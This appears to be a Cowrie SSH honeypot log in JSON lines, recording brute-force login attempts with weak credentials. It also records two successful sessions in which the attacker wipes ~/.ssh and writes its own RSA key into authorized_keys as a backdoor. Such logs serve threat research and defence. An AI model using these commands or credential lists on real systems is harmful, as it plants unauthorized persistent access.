{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:06:17.169212Z","src_ip":"212.227.235.229","session":"f6fe2c211adf"}
{"eventid":"cowrie.login.failed","username":"blank","password":"1234567","message":"login attempt [blank/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T10:06:17.616766Z","src_ip":"212.227.235.229","session":"f6fe2c211adf"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:06:18.716969Z","src_ip":"212.227.235.229","session":"f6fe2c211adf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46710,"dst_ip":"1.2.3.4","dst_port":22,"session":"c320bd45029b","protocol":"ssh","message":"New connection: 212.227.235.229:46710 (1.2.3.4:22) [session: c320bd45029b]","sensor":"my-vps","timestamp":"2025-09-09T10:06:21.374022Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:06:21.375152Z","src_ip":"212.227.235.229","session":"c320bd45029b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:06:21.653451Z","src_ip":"212.227.235.229","session":"c320bd45029b"}
{"eventid":"cowrie.login.failed","username":"blank","password":"qwerty","message":"login attempt [blank/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T10:06:22.789073Z","src_ip":"212.227.235.229","session":"c320bd45029b"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:06:24.068433Z","src_ip":"212.227.235.229","session":"c320bd45029b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56956,"dst_ip":"1.2.3.4","dst_port":22,"session":"61d0100a9df2","protocol":"ssh","message":"New connection: 212.227.235.229:56956 (1.2.3.4:22) [session: 61d0100a9df2]","sensor":"my-vps","timestamp":"2025-09-09T10:06:56.460210Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:06:56.466819Z","src_ip":"212.227.235.229","session":"61d0100a9df2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:06:56.742646Z","src_ip":"212.227.235.229","session":"61d0100a9df2"}
{"eventid":"cowrie.login.success","username":"root","password":"root.123","message":"login attempt [root/root.123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:06:57.870909Z","src_ip":"212.227.235.229","session":"61d0100a9df2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:06:58.501373Z","src_ip":"212.227.235.229","session":"61d0100a9df2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:06:58.502066Z","src_ip":"212.227.235.229","session":"61d0100a9df2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:06:58.505891Z","src_ip":"212.227.235.229","session":"61d0100a9df2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:06:58.782852Z","src_ip":"212.227.235.229","session":"61d0100a9df2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:06:59.784810Z","src_ip":"212.227.235.229","session":"61d0100a9df2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T10:06:59.787881Z","src_ip":"212.227.235.229","session":"61d0100a9df2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T10:07:00.062845Z","src_ip":"212.227.235.229","session":"61d0100a9df2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:07:00.064206Z","src_ip":"212.227.235.229","session":"61d0100a9df2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57246,"dst_ip":"1.2.3.4","dst_port":22,"session":"365f0f5428f7","protocol":"ssh","message":"New connection: 212.227.235.229:57246 (1.2.3.4:22) [session: 365f0f5428f7]","sensor":"my-vps","timestamp":"2025-09-09T10:07:00.336841Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:07:00.341741Z","src_ip":"212.227.235.229","session":"365f0f5428f7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:07:00.613044Z","src_ip":"212.227.235.229","session":"365f0f5428f7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T10:07:01.699543Z","src_ip":"212.227.235.229","session":"365f0f5428f7"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:07:02.972466Z","src_ip":"212.227.235.229","session":"365f0f5428f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57252,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d5fab598349","protocol":"ssh","message":"New connection: 212.227.235.229:57252 (1.2.3.4:22) [session: 2d5fab598349]","sensor":"my-vps","timestamp":"2025-09-09T10:07:03.248939Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:07:03.256866Z","src_ip":"212.227.235.229","session":"2d5fab598349"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:07:03.529323Z","src_ip":"212.227.235.229","session":"2d5fab598349"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:07:04.634557Z","src_ip":"212.227.235.229","session":"2d5fab598349"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:07:04.907357Z","src_ip":"212.227.235.229","session":"61d0100a9df2"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:07:04.918324Z","src_ip":"212.227.235.229","session":"2d5fab598349"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60844,"dst_ip":"1.2.3.4","dst_port":22,"session":"049b4ec4b2df","protocol":"ssh","message":"New connection: 212.227.125.160:60844 (1.2.3.4:22) [session: 049b4ec4b2df]","sensor":"my-vps","timestamp":"2025-09-09T10:07:11.314698Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T10:07:11.319272Z","src_ip":"212.227.125.160","session":"049b4ec4b2df"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-09-09T10:07:11.380364Z","src_ip":"212.227.125.160","session":"049b4ec4b2df"}
{"eventid":"cowrie.login.failed","username":"vyos","password":"vyos","message":"login attempt [vyos/vyos] failed","sensor":"my-vps","timestamp":"2025-09-09T10:07:11.580801Z","src_ip":"212.227.125.160","session":"049b4ec4b2df"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:07:12.643035Z","src_ip":"212.227.125.160","session":"049b4ec4b2df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35636,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce167ee805a8","protocol":"ssh","message":"New connection: 212.227.235.229:35636 (1.2.3.4:22) [session: ce167ee805a8]","sensor":"my-vps","timestamp":"2025-09-09T10:07:18.695159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:07:18.696857Z","src_ip":"212.227.235.229","session":"ce167ee805a8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:07:18.794635Z","src_ip":"212.227.235.229","session":"ce167ee805a8"}
{"eventid":"cowrie.login.success","username":"root","password":"root@123","message":"login attempt [root/root@123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:07:19.212152Z","src_ip":"212.227.235.229","session":"ce167ee805a8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:07:19.494564Z","src_ip":"212.227.235.229","session":"ce167ee805a8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:07:19.502234Z","src_ip":"212.227.235.229","session":"ce167ee805a8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:07:19.519457Z","src_ip":"212.227.235.229","session":"ce167ee805a8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:07:19.618773Z","src_ip":"212.227.235.229","session":"ce167ee805a8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:07:19.829953Z","src_ip":"212.227.235.229","session":"ce167ee805a8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T10:07:19.832701Z","src_ip":"212.227.235.229","session":"ce167ee805a8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T10:07:19.937875Z","src_ip":"212.227.235.229","session":"ce167ee805a8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:07:19.940974Z","src_ip":"212.227.235.229","session":"ce167ee805a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35640,"dst_ip":"1.2.3.4","dst_port":22,"session":"898aa94861b0","protocol":"ssh","message":"New connection: 212.227.235.229:35640 (1.2.3.4:22) [session: 898aa94861b0]","sensor":"my-vps","timestamp":"2025-09-09T10:07:20.038339Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:07:20.041854Z","src_ip":"212.227.235.229","session":"898aa94861b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","